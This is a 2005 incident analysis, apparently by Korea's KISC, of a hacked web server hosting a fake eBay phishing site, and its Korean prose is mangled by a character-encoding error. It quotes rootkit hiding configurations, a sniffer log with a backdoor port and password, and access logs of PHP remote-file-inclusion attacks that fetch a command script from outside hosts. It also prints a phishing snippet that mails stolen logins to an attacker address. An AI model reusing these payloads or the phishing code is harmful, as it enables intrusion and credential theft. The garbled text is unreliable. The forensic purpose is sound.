Çǽ̻çÀÌÆ®¾Ç¿ë¼¹öºÐ¼®»ç·Ê 2005. 3. 2 ÀÎÅͳÝħÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ(KISC)
1. »ç°í °³¿ä
05³â 2¿ù ÇؿܷκÎÅÍ ±¹³» A»ç ȨÆäÀÌÁö ¼¹ö¿¡ ¹Ì±¹ ebay»çÀÇÀ§Àå ÆäÀÌÁö°¡ ¼ºñ½º µÇ°í ÀÖ´Ù´Â Å뺸¸¦ ¹Þ°í ÇØ´ç »çÀÌÆ®¿¡ ´ëÇÑ È®ÀÎÀÛ¾÷¿¡ µé¾î°¬´Ù.
(±×¸² 1) A»ç¿¡ ¼³Ä¡µÈ ebay À§Àå ÆäÀÌÁö
ÀÌ »çÀÌÆ®´Â ½Å°íÁ¢¼öµÈ ½Ã°£¿¡µµ Çǽ̰ü·Ã ÆäÀÌÁö°¡ ¿·ÁÁ® ÀÖ´Â »óÅ¿´À¸¸ç, ¾Æ·¡¿Í °°ÀÌ 4z1z3"¶ó´Â µð·ºÅ丮¸¦ »õ·Î ¸¸µé¾î Çǽ̰ü·Ã ÆäÀÌÁö¸¦ ¸¸µé¾î ³õ¾Ò¾ú´Ù.
ÇÏÁö¸¸, °ø°ÝÀÚ°¡ ȨÆäÀÌÁö ÃʱâȸéÀ» º¯Á¶ÇÏ´Â µîÀÇ ÇàÀ§¸¦ ÇÏÁö¾Ê°í 4z1z3"¿Í °°Àº µð·ºÅ丮¸¦ ¸¸µé¾î Çǽ̿¡ ÀÌ¿ëÇÏ°í ÀÖ¾î ȨÆäÀÌÁö °ü¸®ÀÚ°¡ ÇØ´ç »ç½ÇÀ» ÀÎÁöÇϱâ Èûµé¾ú´Ù.
2. ÇÇÇØ ÇöȲ ¹× °ø°Ý ¿øÀÎ ºÐ¼®
ÇÇÇؽýºÅÛ ´ã´çÀÚ¿Í ¿¬¶ôÀ» ÃëÇÑ °á°ú, °ü¸®ÀÚ°¡ ºÐ¼®ÀÇ·Ú ¿äûÇÔ¿¡µû¶ó ºÐ¼®À» ½ÃÀÛÇÏ¿´´Ù. ÇÇÇؽýºÅÛÀº IDC¿¡ ÀÔÁÖÇØ ÀÖ¾úÀ¸¸ç, ¼¹ö È£½ºÆà ¾÷üÀÇ ¼¹ö¸¦ÀÓ´ëÇÏ¿© »ç¿ëÇÏ°í ÀÖ¾ú°í, ÇØ´ç ¼¹ö¸¦ ȨÆäÀÌÁö ¼¹ö·Î »ç¿ëÇÏ°í ÀÖ¾ú´Ù. ÇöÀå µµÂø ½Ã, ÇØ´ç ½Ã½ºÅÛÀº ÇØÅ·À¸·Î ÀÎÇÑ ¾Ç¼º Æ®·¡ÇÈ ¹ß»ý°¡´É¼ºÀ¸·Î ÀÎÇØ È£½ºÆà ¾÷ü¿¡¼ ³×Æ®¿öÅ© ÄÉÀ̺íÀ» ºÐ¸®ÇÑ »óÅ¿´À¸¹Ç·Î, ÄÜ¼Ö »ó¿¡¼ »ç°í ºÐ¼®À» ÁøÇàÇÏ¿´´Ù.
ÇÇÇØ ½Ã½ºÅÛÀº Linux 7.1, Apache 1.3.19, PHP 4.3.1 ȯ°æÀ» »ç¿ëÇÏ°í ÀÖ¾úÀ¸¸ç, »ç¿ë ÁßÀÎ À¥ °Ô½ÃÆÇÀÌ Á¦·Îº¸µå(Zeroboard) 4.1 pl4¿´´Ù . Á¦·Îº¸µå´Â Ãë¾àÇÑ ¹öÀüÀ̾úÀ¸¸ç, php.iniÀÇ ¼³Á¤ ¶ÇÇÑ"allow_url_fopen=On", "register_globals=On"À¸·Î ¼³Á¤µÇ¾î ÀÖ¾î ¿ÜºÎÀÇ °ø°ÝÀÌ °¡´ÉÇÑ »óÅ¿´´Ù ÃÖ±Ù PHP ȯ°æ¼³Á¤ ¿À·ù ¹× Á¦·Îº¸µåÀǺ¸¾È Ãë¾àÁ¡À¸·Î ÀÎÇÑ À¥ º¯Á¶ »ç°í°¡ ´ë±Ô¸ð·Î ¹ß»ýµÇ¾î ÀÌ Ãë¾àÁ¡À¸·Î ÀÎÇÑ °ø°ÝÀ» ¿ì¼± ÀǽÉÇÏ¿´´Ù.
/var/log µð·ºÅ丮 Àüü°¡ »èÁ¦µÈ »óÅ¿´À¸¸ç, À̴ ȨÆäÀÌÁöu54644 .Å·µî ÀϹÝÀûÀÎ ÇØÅ·¿¡¼´Â ½±°Ô º¼ ¼ö ¾ø´Â °ÍÀ¸·Î °ø°ÝÀÚ°¡ ÀÚ½ÅÀÇ ÇàÀ§¸¦ ¼û±â±â À§ÇÑ ÇàÀ§·Î ÆǴܵȴÙ.
¶ÇÇÑ, ½ÇÁ¦ ÇØ´ç ÇÇÇØ ½Ã½ºÅÛ¿¡´Â »ç°í°¡ Á¢¼öµÈ 2¿ù ÀÌÀü¿¡ ¸¹Àº °ø°Ý°ü·Ã ÆÄÀϵé°ú ·çƮŶÀÌ ¼³Ä¡µÇ¾î ÀÖ¾î ´Ù¼öÀÇ °ø°ÝÀÚ¿¡ ÀÇÇØ À̹̰ø°ÝÀ» ¹ÞÀº °ÍÀ¸·Î ÃßÁ¤µÈ´Ù.
´ÙÀ½Àº ÇØ´ç ½Ã½ºÅÛ¿¡¼ ¹ß°ßÇÑ °ø°ÝÀÚÀÇ °ø°ÝÇàÀ§¿Í ÇÇÇØ ÇöȲµéÀÌ´Ù.
¡à ·çƮŶ, ½º´ÏÆÛ µî ¾Ç¼º ÇÁ·Î±×·¥ ¼³Ä¡ 01³â 3¿ù ÀÌÈĺÎÅÍ ´Ù¼öÀÇ µð·ºÅ丮¿¡¼ ¾Ç¼º ÇÁ·Î±×·¥ÀÌ ¹ß°ßµÇ¾úÀ¸¸ç, ½Ã½ºÅÛ ÆÄÀϵ鵵 »ó´ç¼ö º¯Á¶µÈ »óÅ¿´´Ù. ¸ÕÀú, 01³â 3¿ù 15ÀÏ /usr/lib/libsh¿¡ ½º´ÏÆÛ ÇÁ·Î±×·¥(shsniff)¿Í ·Î±× »èÁ¦ ÇÁ·Î±×·¥(hide), ±×¸®°í ½ºÄ³´× µµ±¸ µîÀÌ ¼³Ä¡µÇ¾ú´Ù.
[root@t4linux libsh]# ls -alct total 36 -rw-r--r-- 1 root root 2000 Mar 15 2001 hide -rw-r--r-- 1 root root 1345 Mar 15 2001 shsb drwxr-xr-x 2 root root 4096 Feb 24 19:11 utilz drwxr-xr-x 2 root root 4096 Feb 24 19:11 .sniff drwxr-xr-x 2 root root 4096 Feb 24 19:11 .owned drwxr-xr-x 2 root root 4096 Feb 24 19:11 .backup drwxr-xr-x 4 root root 4096 Feb 24 19:11 .. [root@t4linux libsh]# | 05³â 1¿ù 26ÀÏ¿¡´Â /usr/include ¾Æ·¡¿¡ ·çƮŶÀÇ È¯°æ¼³Á¤ ÆÄÀÏÀ̹߰ߵǾúÀ¸¸ç, ÀÌ ÆÄÀÏÀÌ »ý¼ºµÈ ³¯Â¥¿¡ ls, ps µî ÁÖ¿ä ÆÄÀϵ鵵 º¯Á¶µÇ¾î ÀÖ¾ú´Ù ÀϹÝÀûÀ¸·Î /usr/include´Â ÇìµåÆÄÀÏ(*.h)ÀÌ ÀúÀåµÇ´Â °÷À¸·Î ¿©±â¿¡ file.h, hosts.h¿Í °°ÀÌ Á¤»óÀûÀÎ ÇìµåÆÄÀÏ·Î À§ÀåÇÏ¿© ·çÆ® ŶÀ» À§ÇÑ ¼³Á¤ÆÄÀÏÀ» ¸¸µé¾î ³õ°í ÀÖ¾ú´Ù.
´ÙÀ½Àº ·çƮŶ ȯ°æ¼³Á¤ÆÄÀÏÀÇ ³»¿ëÀ¸·Î½á, À̸¦ ÅëÇØ ¿ªÀ¸·Î °ø°ÝÇÁ·Î±×·¥µéÀ̳ª °ø°ÝÀÚ¸¦ ÃßÁ¤ÇÒ ¼ö ÀÖ´Ù.
ÆÄÀϸí |
³»¿ë |
ÆÄÀϸí |
³»¿ë |
file.h |
sh.conf libsh .sh system shsb libsh.so shp shsniff srd0 |
hosts.h |
2 212.110 2 195.26 2 194.143 2 62.220 3 2002 4 2002 3 6667 4 6667 3 61690 4 61690 |
log.h |
mirkforce synscan syslog
|
proc.h |
3 burim 3 mirkforce 3 synscan 3 ttyload 3 shsniff 3 ttymon 3 shsb 3 shp 3 hide 4 ttyload | hosts.h ÆÄÀÏ¿¡ ƯÁ¤ IP ºí·Ï°ú Æ÷Æ®µéÀÌ º¸À̴µ¥, IP ºí·Ï(À¯·´Áö¿ªIP ºí·ÏÀÓ)Àº °ø°ÝÀÚÀÇ IPÀÏ °¡´É¼ºÀÌ ³ôÀ¸¸ç, Æ÷Æ®¹øÈ£´Â ¹éµµ¾î Æ÷Æ®³ª °ø°ÝÀ» À§ÇØ »ç¿ëµÇ´Â Æ÷Æ®·Î ÃßÁ¤µÈ´Ù °ø°ÝÀÚ´Â IRC¿¡ »ç¿ëµÇ´Â6667 Æ÷Æ®µµ ¼û±â°íÀÚ ÇÏ¿´´Ù.
2005³â 2¿ù 9ÀÏ¿¡´Â ÇÇ½Ì °ü·Ã ÆÄÀϵéÀÌ ¼³Ä¡µÈ µð·ºÅ丮 À̸§(.4z1z4)°ú µ¿ÀÏÇÑ µð·ºÅ丮 /dev µð·ºÅ丮 ³»¿¡ »ý¼ºµÇ¾î ÀÖ¾ú´Ù. /dev µð·ºÅ丮´Â À¯´Ð½º ½Ã½ºÅÛ¿¡¼ ÀåÄ¡ÆÄÀϵéÀÌ ÀÖ´Â °÷À̳ª, °ü¸®ÀÚ°¡ °ü½ÉÀ» °¡Áö°í º¸Áö ¾Ê´Â Á¡À» ÀÌ¿ëÇÏ¿© °ø°ÝÀÚµéÀÌ °ø°Ýµµ±¸³ª °ø°Ý °á°ú¹°µéÀ» ¼û°Ü³õ´Â Àå¼Ò·Î ¸¹ÀÌ ÀÌ¿ëµÇ°í ÀÖ´Ù . /dev/.4z1z4 µð·ºÅ丮¿¡´Â ½Ã½ºÅÛ¿¡¼ ¹ß»ýµÇ´Â ¸ðµç Å° ÀԷ°ªÀÌ ÀúÀåµÇµµ·Ï ÇÏ´Â ÇÁ·Î±× ·¥°ú ±× °á°ú°¡ ÀúÀåµÈ ÆÄÀÏ(.sniffer)ÀÌ ¹ß°ßµÇ¾ú´Ù. ´ÙÀ½Àº snifferÀÇ ³»¿ë ÀϺηνá DB »ç¿ëÀÚµéÀÇ Æнº¿öµå°¡ ³ëÃâµÇ¾î ÀÖ¾úÀ¸¸ç, °ø°ÝÀÚ°¡ ´Ù¸¥ ½Ã½ºÅÛÀ» °ø°ÝÇÏ´Â °úÁ¤µµ ÀúÀåµÇ¾î ÀÖ¾ú´Ù
./mysqldump -u root -p mysql : Enter password: xxxxxxxxxx -> DB ¾ÏÈ£°¡ ³ëÃâµÊ ./mysqldump -u lee -p lee : Enter password: xxxxxx -> DB ¾ÏÈ£°¡ ³ëÃâµÊ ... chattr -i /bin/ps /usr/sbin/sshd -R : ./login -h xxx.xxx.xxx.218 : -> ÇØÅ·ÇÑ ¶Ç ´Ù¸¥ ¼¹ö·ÎÀÇ Á¢¼ÓÀ» ÇÏ´Â ³»¿ëÀÌ ÀúÀåµÊ /dev/null Listening to port 35214 password: m2o3a4z5 /usr/sbin/sshd -R : .. | ¡à Á¦·Îº¸µå °Ô½ÃÆÇÀ» ÀÌ¿ëÇÑ ÇØÅ· ÈçÀû 2005³â 2¿ù 14ÀÏ ÇÇÇØ ½Ã½ºÅÛ¿¡¼ ¿î¿µ ÁßÀÎ 3°³ÀÇ µµ¸ÞÀο¡¼ »ç¿ëÁßÀÎ Á¦·Îº¸µåÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý½Ãµµ°¡ À¥ access_log¸¦ ÅëÇØÈ®ÀεǾú´Ù.
200.103.32.152 - - [14/Feb/2005:08:26:06 +0900] "GET /bbs//include/write.php? dir=http://www.xxx.com.br/contador/cmd?&cmd=id HTTP/1.0" 200 0 219.116.94.139 - - [14/Feb/2005:09:54:38 +0900] "GET http://xxx.xxx.xxx.kr/bbs//include/write.php? dir=http://www.xxx.ubbi.com.br/cmd.txt?&cmd=ver HTTP/1.0" 200 0 | °ø°ÝÀÚ´Â 2¿ù 14ÀÏ°æ ºê¶óÁú(200.103.32.152)°ú ÀϺ»(219.116.94.139)À¸·ÎºÎÅÍ PHP Injection °ø°ÝÀ» ½ÃµµÇÏ¿© À¥¼¹öÀÇ »ç¿ëÀÚ °èÁ¤ µîÀ» È®ÀÎÇÏ¿´´Ù. ·Î±×¿¡ ³²Àº ±â·ÏÀ¸·Î´Â ½ÇÁ¦ °ø°ÝÀÌ °¡´ÉÇÑ »óÅ¿´À½À» È®ÀÎÇÒ ¼ö ÀÖ¾úÀ¸³ª ÇØ´ç ·Î±×ÆÄÀÏ¿¡¼ ½Ã½ºÅÛ Ä§ÀÔ µî Ãß°¡ÀûÀÎ °ø°ÝÇàÀ§¿¡ ´ëÇؼ´Â È®ÀÎÇÒ ¼ö ¾ø¾ú´Ù.
3. ÇÇ½Ì °ü·Ã ºÐ¼®
¡à ÇÇ½Ì °ü·Ã ÆÄÀÏ ºÐ¼® ÇÇÇؽýºÅÛ¿¡´Â ¹Ì±¹ÀÇ ÀüÀÚ»ó°Å·¡ »çÀÌÆ®ÀÎ ebayÀÇ À§Àå »çÀÌÆ®°¡ ±¸ÃàµÇ¾î ÀÖ¾úÀ¸¸ç, ÀϹÝÀûÀÎ ÇÇ½Ì »ç·Ê¿Í ¸¶Âù°¡Áö·Î ½ºÆÔ ¸ÞÀÏ ¹ß¼ÛµîÀ» ÅëÇØ À§Àå ÆäÀÌÁöÀÇ Á¢¼ÓÀ» À¯µµÇÑ °ÍÀ¸·Î ¿¹»óµÈ´Ù.
[root@t4linux ebay]# ls -alct total 168 drwxr-xr-x 2 root root 4096 Feb 24 19:11 1_files drwxr-xr-x 3 root root 4096 Feb 24 16:51 . -rw-r--r-- 1 root root 960 Feb 16 16:52 ebay2.php -rw-r--r-- 1 root root 12686 Feb 16 16:53 http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_contine_verify_admin _security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrbay1.htm <Áß°£ »ý·«> -rw-r--r-- 1 root root 14331 Feb 16 16:53 http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_contine_verify_admin _security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrbay7.htm -rw-r--r-- 1 root root 585 Feb 16 16:54 login1.php -rw-r--r-- 1 root root 148 Feb 16 16:52 period_ani.gif -rw-r--r-- 1 root root 195 Feb 16 16:52 1.php -rw-r--r-- 1 root root 1088 Feb 16 16:52 ebay1.php drwxr-xr-x 3 root root 4096 Feb 16 16:52 .. [root@t4linux ebay]# | ÀÌ À§Àå ÆäÀÌÁöµéÀÌ °í°´ Á¤º¸¸¦ »©³»´Â °úÁ¤Àº ´ÙÀ½°ú °°¾Ò´Ù.
¨ç ÃÖÃÊ Á¢¼Ó ½Ã, ebay »çÀÌÆ®ÀÇ ¾ÆÀ̵ð¿Í ¾ÏÈ£¸¦ ÀÔ·ÂÇÏ´Â ·Î±ä ÆäÀÌÁö¿¡ Á¢¼Ó ¨è ÀÌ ÆäÀÌÁö¿¡¼ ½ÇÁ¦ Á¸ÀçÇÏ´Â ¾ÆÀ̵ð, ¾ÏÈ£¸¦ ¸Â°Ô ÀÔ·ÂÇÏ¿´´õ¶óµµ ÀÔ·ÂÀÌ Æ²·È´Ù´Â ¸Þ½ÃÁö°¡ ±âÀçµÈ µÎ ¹ø° ÆäÀÌÁö·Î ¿¬°áµÇ¾î ÀçÂ÷ ¾ÆÀ̵ð¿Í ¾ÏÈ£¸¦ ÀÔ·ÂÇϵµ·Ï À¯µµÇÔ ¨é µÎ ¹ø° ÆäÀÌÁö¿¡¼ ÀÔ·ÂµÈ ¾ÆÀ̵ð¿Í ¾ÏÈ£´Â ƯÁ¤ À¥¸ÞÀÏ ÁÖ¼Ò(idyearbayids@yahoo.com)·Î ¹ß¼Û µÇ¸ç ÀÚµ¿À¸·Î ¼¼ ¹ø° ÆäÀÌÁö·Î ¿¬°áµÊ
$ip = getenv("REMOTE_ADDR"); $mail1='midyearbayids@yahoo.com'; $subject="eb|aylog|in !"; <Áß°£ »ý·«> if ($result==1) mail($mail1,$subject,$mailbody); <Áß°£ »ý·«> ?> | ¨ê ¼¼ ¹ø° ÆäÀÌÁö¿¡¼´Â °³ÀÎÁ¤º¸¸¦ ÀÔ·ÂÇÏ´Â ÆäÀÌÁö·Î¼ Ä«µå¹øÈ£ ¹× ¹Ì±¹ÀÇ »çȸº¸Àå¹øÈ£(Social Security Number)µîÀÇ Á¤º¸¸¦ ÀÔ·ÂÇϵµ·Ï µÇ¾î ÀÖÀ¸¸ç, ÀÔ·ÂµÈ Ä«µå¹øÈ£¸¦ È®ÀÎÇÑ´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ°í °úÁ¤ °ø°ÝÀÚ ¸ÞÀÏÁÖ¼Ò·Î ÀÔ·ÂµÈ ³»¿ëÀ» ¹ß¼ÛÇÑ ÈÄ ³× ¹ø° ÆäÀÌÁö·Î ¿¬°áµÊ ¨ë ³× ¹ø° ÆäÀÌÁö¿¡¼´Â ÀÔ·ÂµÈ ÀºÇàÁ¤º¸°¡ À߸øµÇ¾ú´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ¸ç, Ä«µå¹øÈ£¿Í ÀºÇà°èÁ¹øÈ£µîÀÇ Á¤º¸¸¦ ÀÔ·ÂÇÏ´Â ³»¿ëÀÌ ±âÀçµÇ¾î ÀÖÀ½ ÀÔ·Â ¿Ï·á½Ã ¿ª½Ã °ø°ÝÀÚ ¸ÞÀÏÁÖ¼Ò·Î ÀԷ³»¿ëÀ» ¹ß¼ÛÇÑ ÈÄ ¸¶Áö¸· ÆäÀÌÁö·Î ¿¬°áµÊ ¨ì ¸¶Áö¸· ÆäÀÌÁö¿¡¼´Â ÀÔ·ÂµÈ ³»¿ëÀÌ Àß È®ÀεǾú´Ù´Â ¸Þ½ÃÁö¿Í ÇÔ²² ÀÎÅÍ³Ý ÀͽºÇ÷ξî Á¾·á¸¦ ¹¯´Â È®ÀÎâÀÌ ¿¸²
¿©±â¿¡¼ À§Àå »çÀÌÆ®ÀÇ °ø°ÝÀÚ ¸ÞÀÏ ÁÖ¼Ò¸¦ º¯°æÇÑ ÈÄ Ä«µå¹øÈ£ µîÀ» ÀÔ·ÂÇÑ °á°ú ¾Æ·¡¿Í °°Àº °í°´ Á¤º¸°¡ ¸ÞÀÏ ÁÖ¼Ò·Î ¼ö½ÅµÇ´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.
¡à ÇÇ½Ì °ü·Ã ·Î±× ºÐ¼® 2005³â 2¿ù 13ÀÏ, Çǽ̰ü·Ã ÆäÀÌÁö¿¡ ´ëÇÑ Á¢¼Ó ½ÇÆÐ ±â·ÏÀÌ ³²¾Æ ÀÖ¾ú´Ù.
[Sun Feb 13 13:30:20 2005] [error] [client 69.31.82.10] Directory index forbidden by rule: /home/kypp/public_html/.4z1z4/ [Sun Feb 13 13:30:30 2005] [error] [client 69.31.82.10] Directory index forbidden by rule: /home/kypp/public_html/.4z1z4/.ssl/html/ebay/ [Sun Feb 13 13:36:31 2005] [error] [client 209.247.193.180] Directory index forbidden by rule: /home/kypp/public_html/.4z1z4/.ssl/html/ebay/1_files/ | ±×¸®°í, 05³â 2¿ù 14ÀÏ »õº®°æºÎÅÍ À¥ ·Î±×(access_log)¿¡ ebay·Î À§ÀåµÈ ÆäÀÌÁö¿¡ ´ëÇÑ Á¢¼Ó ¼º°ø ±â·ÏÀÌ ´Ù¼ö ³²¾Æ ÀÖ¾ú´Ù.
66.135.207.155 - - [14/Feb/2005:04:26:27 +0900] "GET /.4z1z4/.ssl/html/ebay/http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_con tine_verify_admin_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrba y4.htm HTTP/1.1" 200 36471 66.77.136.213 - - [14/Feb/2005:05:38:26 +0900] "GET /.4z1z4/.ssl/html/ebay/http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_con tine_verify_admin_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrba y6.htm HTTP/1.0" 200 20713 168.143.113.112 - - [14/Feb/2005:11:24:52 +0900] "GET /.4z1z4/.ssl/html/ebay/http_eBay.comdone-7E-20secure-7EaSSL-7Earestricted_activations_con tine_verify_admin_security_ebay_SSLSECUREDaeBayaEcheckaEsecaccountID_har263748fusersecrba y4.htm HTTP/1.1" 200 36471 ..... | À̶§ºÎÅÍ ÇÇ½Ì ¸ÞÀÏÀ» ¼ö½ÅÇÑ »ç¿ëÀÚµéÀÌ Å¬¸¯ÇÏ¿© ÇØ´ç ÆäÀÌÁö¸¦ º»°ÍÀ¸·Î º¸À̸ç, ÇØ¿ÜÀÇ 7°³ Á¤µµÀÇ IP°¡ Á¢¼ÓÇÏ¿´´Ù. ÇÏÁö¸¸, ½ÇÁ¦ À§Àå ÆäÀÌÁö¿¡¼ °³ÀÎ Á¤º¸¸¦ ÀÔ·ÂÇÏ°í °ø°ÝÀÚ¿¡°Ô ¸ÞÀÏÀÌ ¹ß¼ÛµÇ¾ú´ÂÁö¸¦ È®ÀÎÇϱâ À§ÇØ syslog¸¦ È®ÀÎÇÏ¿´À¸³ª midyearbayids@yahoo.com ·ÎÀÇ ¸ÞÀÏ¹ß¼Û ³»¿ªÀº º¼ ¼ö ¾ø¾ú´Ù.
4. °á·Ð
ÇÇÇØ ½Ã½ºÅÛÀº ÀÌ¹Ì ¿À·¡ ÀüºÎÅÍ ¿©·¯ ¹ø¿¡ °ÉÃÄ ´Ù¼öÀÇ ÇØÄ¿°¡ ÇØÅ·À» ÇÏ¿´À¸¸ç, ls, ps µî ÁÖ¿ä ½Ã½ºÅÛ ÆÄÀÏÀÌ º¯°æµÇ°í, ½º´ÏÇÎ ÇÁ·Î±×·¥ÀÌ ¼³Ä¡µÇ´Â µî ±¤¹üÀ§ÇÑ ÇÇÇظ¦ ÀÔ¾ú´Ù ÃÖ±Ù¿¡´Â À¥ º¯Á¶ »ç°Ç¿¡¼ÈçÈ÷ º¼ ¼ö ÀÖ´Â Á¦·Îº¸µåÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý(PHP Injection)µµ ÀÖ¾ú´Ù.
ÇÏÁö¸¸, ÀÌ·¯ÇÑ °ø°Ý¿¡ ÀÇÇØ À§Àå ebay »çÀÌÆ®°¡ »ý¼ºµÇ¾ú´Ù´Â ·Î±×´Â ãÀ» ¼ö ¾ø¾ú´Ù ¶ÇÇÑ ÀϹÝÀûÀÎ ÇØÅ·»ç°í¿¡¼ º¸±â µå¹°°Ô ·Î±× µð·ºÅ丮(/var/log) Àüü¸¦ »èÁ¦ÇÏ¿© ÃßÀûÀ» ÇÇÇÏ°íÀÚ ÇÏ¿´´Ù.
º» »ç°í¿¡¼ ÇÇ½Ì À§Àå »çÀÌÆ®ÀÇ °ø°Ý ¹æ¹ý°ú °ø°ÝÀÚ¸¦ ÃßÀûÇÏ°íÀÚÇÏ¿´À¸³ª Á÷Á¢ÀûÀÎ ´Ü¼¸¦ ãÀ» ¼ö ¾ø¾î ¾Æ½¬¿ü´Ù ±×·¯³ª ÃÖ±Ù ±¹³»´Ù¼öÀÇ À¥¼¹öµéÀÌ °¡Áö°í ÀÖ´Â PHP °ü·Ã Ãë¾àÁ¡ÀÌ ´Ü¼ø ÃʱâÈ¸é º¯Á¶¿¡ ÀÌ¿ëµÉ »Ó¸¸ ¾Æ´Ï¶ó Çǽ̰ú °°Àº ¹üÁË¿¡µµ ÀÌ¿ëµÉ ¼ö ÀÖ´Ù´Â °¡´É¼ºÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.
[Ãâó - Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø]
|
|